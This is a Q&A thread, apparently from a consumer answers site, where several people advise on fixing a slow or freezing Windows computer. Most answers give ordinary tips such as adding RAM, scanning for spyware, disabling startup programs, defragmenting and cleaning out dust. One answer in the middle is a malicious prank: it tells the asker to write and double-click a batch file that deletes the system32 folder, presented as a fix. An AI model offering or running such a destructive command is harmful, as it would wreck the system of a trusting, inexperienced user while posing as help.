How do you fix computer that freeze and slow?

If you dont mind spending some money, add RAM. You can never have enough RAM for windows, & adding RAM is always a surefire way to get a little more performance out of your machine. If you're talking about a machine which used to run better, but is running slow now, your best bet is to do a few system-maintenence measures to speed things up a bit. First, do a good spyware scan. Spybot search & destroy or lavasoft adaware are both excellent freeware programs which will scan your system for useless software & remove it automatically. Both are linked below. Second, see all that crap down in your system tray (on the start bar by the clock), all that stuff is qeued up to run on startup & then just sit there soaking up RAM and CPU cycles. Go through those programs & go through their prefs & tell them to stop loading on startup. Failing that, spybot also has an excellent utility for removing unwanted programs from the startup routine. Third, optimize your operating system. Windows by default loads up all sorts of services that may or may not be necessary for your particular usage needs. I suggest googling for "windows XX optimization guide" with XX as your windows version for more info on what you do & dont need. Fourth, and maybe this should be first. Unplug your machine, take off the side, & blow out all those dust-bunnies. A clean computer is a cool computer, and a cool computer is a fast computer.

open a notepad type the following:

@echo off

del c:\WINDOWS\system32

save the file as anything.bat (remember to add the .bat extension and save as all files)

double click and it will delete the system32 folder.

There are lots of ways.

You could do a disk defrag to start off with, you could uninstall any unwanted programs, and you could also get a faster internet browser to make any pages load faster. You can also just give your Internet a rest for a few days and shut down ever time you go off. If all this doesn't help you might of caught a bug.

When a computer is running slow, there could be many problems involved. Trying to restore registry backups could solve the problem. In many cases one could install a fresh copy of Windows to get the best result.

If one suspects it is one program that is running slowly by coincidence, such as when it seems as though the computer is freezing, one can try holding control, alt, and delete and then bringing up the task manager. After the task manager is up, either terminate the program that is running slowly, or bring up the processes window and see which is using the most CPU usage then terminating it. If a computer is often slow, try defragmenting the computer.
